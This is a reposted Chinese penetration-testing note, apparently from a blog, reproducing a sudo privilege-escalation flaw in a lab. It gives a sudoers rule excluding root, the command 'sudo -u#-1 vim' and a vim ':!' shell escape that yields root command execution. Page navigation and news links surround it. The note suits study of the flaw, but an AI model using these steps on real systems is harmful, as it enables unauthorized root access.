渗透笔记之sudo逻辑漏洞 - 代码天地

渗透笔记之sudo逻辑漏洞

其他 2020-04-13 10:27:33 阅读次数: 0

渗透笔记之sudo逻辑漏洞

Sudo 利用vim编辑器进行一个权限绕过
1.创建用户useradd 用户名
passwd 用户名
password 密码
2.用root账号修改/etc/sudoers配置文件在文件里添加
新用户名 ALL = (ALL, !root) /usr/bin/vim
新用户名 ALL = (ALL, !root) /usr/bin/id
在这里插入图片描述
强制保存退出
3.切换用户 su用户名 sudo -u#-1 vim
命令执行成功以后就会进入下图这样的界面

4.然后我们直接执行:!命令例如 :!whoami

5.可以看到刚才执行不了的命令都可以执行了然后看一下 whoami 自己的身份
在这里插入图片描述
哒哒哒~

一只哈士奇ღ

发布了44 篇原创文章 · 获赞 7 · 访问量 2817

私信关注

猜你喜欢

转载自blog.csdn.net/qq_37113223/article/details/104850669

渗透笔记之sudo逻辑漏洞

渗透测试-逻辑漏洞专题

渗透之漏洞利用

逻辑漏洞之支付漏洞

逻辑漏洞之越权漏洞

逻辑漏洞挖掘之——逻辑漏洞概述

渗透测试之XSS漏洞

3. 逻辑漏洞之支付漏洞

逻辑漏洞之越权、支付漏洞

业务逻辑漏洞都有哪些？渗透时参考

逻辑漏洞之并发测试

逻辑漏洞之密码重置

OWASP学习之逻辑漏洞

Struts2漏洞渗透笔记

[渗透笔记][漏洞复现] msf初步

渗透测试之CSRF漏洞攻击

渗透测试之Nessus漏洞扫描

渗透测试之文件上传漏洞

渗透测试之文件下载漏洞

渗透测试之文件包含漏洞

web渗透之文件上传漏洞

kali linux渗透测试之漏洞扫描

渗透笔记之渗透测试流程篇

渗透笔记之信息收集

4. 逻辑漏洞之越权访问

逻辑漏洞之任意用户重置密码

逻辑漏洞之密码找回总结

业务逻辑漏洞探索之绕过验证

逻辑漏洞之任意密码重置

逻辑漏洞小结之SRC篇

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)